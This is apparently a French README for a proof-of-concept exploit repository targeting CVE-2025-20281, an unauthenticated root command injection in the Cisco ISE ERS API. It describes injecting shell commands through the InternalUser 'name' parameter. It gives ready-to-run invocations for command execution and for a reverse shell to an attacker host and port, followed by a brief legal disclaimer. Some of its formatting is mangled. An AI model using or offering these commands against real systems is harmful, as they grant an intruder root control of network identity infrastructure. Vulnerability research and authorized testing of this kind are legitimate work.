
Exploit d'exécution de code à distance non authentifié pour CVE-2025-20281 dans l'API ERS de Cisco ISE. Exécutez des commandes ou lancez des shells inversés en tant que root — aucune authentification requise.
Ce dépôt contient un exploit proof-of-concept en Python 3 pour CVE-2025-20281, une vulnérabilité critique dans Cisco Identity Services Engine (ISE) qui permet l'exécution de code à distance (RCE) non authentifiée en tant que root via l'API ERS.
Le point de terminaison
/ers/sdk#_de Cisco ISE ERS ne valide pas l'authentification lors du traitement des demandes de création d'utilisateur.
En injectant des commandes shell dans le paramètrenamede l'objetInternalUser, les attaquants peuvent exécuter des commandes en tant que root.
--cmd)--whoami--reverse)python3 CVE-2025-20281.py TARGET [--whoami | --cmd "id" | --reverse LHOST LPORT]
Commande de test :
python3 CVE-2025-20281.py 192.168.1.10 --whoami
Exécuter une commande personnalisée :
python3 CVE-2025-20281.py 192.168.1.10 --cmd "id && hostname"
Shell inversé :
python3 CVE-2025-20281.py 192.168.1.10 --reverse 10.10.14.99 4444
⚠️ Avertissement légal
Ce code est fourni uniquement à des fins éducatives et de tests autorisés. N'utilisez pas ce logiciel contre des réseaux ou systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.
Vulnérabilité : Divulguée via un avis Cisco
PoC Refactor : illdeed